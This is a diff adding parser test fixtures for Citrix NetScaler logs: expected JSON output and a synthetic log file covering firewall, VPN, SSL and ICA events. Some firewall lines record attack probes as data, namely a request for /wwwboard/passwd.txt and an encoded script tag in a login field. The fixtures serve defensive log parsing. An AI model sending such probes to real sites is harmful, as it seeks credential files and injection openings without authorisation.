cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SIGNATURE_MATCH", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "POousP7CIMW5nwZ5Rs4nq5DND0sA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + 
"region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "224", + "original": "Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "205", + "method": "GET" + } + }, + "message": " Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56687 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "txt", + "original": "http://vpx247.example.net/FFC/wwwboard/passwd.txt", + "path": "/FFC/wwwboard/passwd.txt", + "scheme": "http" + } + } + ] +} \ No newline at end of file diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log new file mode 100644 index 00000000000..652093ff421 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log 
@@ -0,0 +1,107 @@
+Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area="Bad tag: script"
+Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite "RC4-MD5 TLSv1.2 Non-Export 128-bit" - Session Reuse
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352
+Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
+Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
+Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: "SIP request received" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: "Log info RTSP ALG call deletion" - Group: RTSPALG - Session_ID: session123 -
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command "scp file.txt" - Status "Success"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type "Chrome" - SSLVPN_client_type NetScalerPlugin - Group(s) "IT,RemoteWorkers"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time "2023-04-01T08:00:00Z" - End_time "2023-04-01T12:00:00Z" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod "Timeout" - Group(s) "HR,Finance"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime "2023-04-01T09:00:00Z" - connectionId 9a8b7c
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime "2023-04-01T09:00:00Z" - endTime "2023-04-01T09:45:00Z" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time "2023-04-01T10:00:00Z" - End_time "2023-04-01T11:00:00Z" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) "Developers,QA"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact "2023-04-01T13:00:00Z" - Group(s) "Sales,Marketing"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time "2023-04-01T14:00:00Z" - End_time "2023-04-01T15:00:00Z" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) "Management,Executives"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "SecurityPolicy"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "UnauthorizedAccessAttempt"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression "geoLocationBlocked" -
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite "ECDHE-RSA-AES256-GCM-SHA384" - Session 0x12a7bf
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite "TLS_AES_128_GCM_SHA256" - Session 0x12a7c0
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name "CN=Example CA, O=Example Organization, C=US"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name "CN=www.example.com, O=Example Company, C=US"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_FAILURE 4471 0 : Failure Reason: CredentialsInvalid
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA LOGIN_FAILED 4471 0 : User john.doe - Client_ip 192.168.1.104 - Failure_reason "Invalid password" - Browser Chrome
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAA EXTRACTED_GROUPS 4471 0 : Extracted_groups "Engineering,Staff"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_XMLPAYLOAD_CONTENT_TYPE_MISMATCH 4471 0 : XML Mismatched content-type in HTTP header detected = "text/plain".
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DENYURL 4471 0 : Disallow Deny URL for rule pattern = "http://example.com/badpath".
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_CONTENT_TYPE 4471 0 : Unknown content-type header value = "application/unknown".
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REFERER_HEADER 4471 0 : parsing referer header 'http://malicious.com' failed
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_URL 4471 0 : URL length(2150) is greater than maximum allowed(2048).
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_COOKIE 4471 0 : Cookie header length(1025) is greater than maximum allowed(1000).
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512).
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024).
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096).
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). Memory Allocation failed.
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature available: RuleID = 101
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type "Firefox" - Group(s) "Admin,IT"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time "2023-04-04T08:30:00Z" - End_time "2023-04-04T09:30:00Z" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod "UserInitiated" - Group(s) "HR,Finance"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy "AccessRestriction"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL https://example.com/proxy?url=page
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_MATCHED_URL 4471 0 : MATCHED_URL https://example.com/assets/image.jpg
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM ACTION_MISMATCH 4471 0 : Client 1.128.0.0 - Profile ThreatPrevention - Action Alert - Value High
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM PCRE_ERROR 4471 0 : Client 1.128.0.0 - Profile ContentFilter - Action Validate - PCRE error code 5
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TRANSFORM REQ_WRITE_ERROR 4471 0 : Client 1.128.0.0 - Profile Gateway - Failed to write Location request header
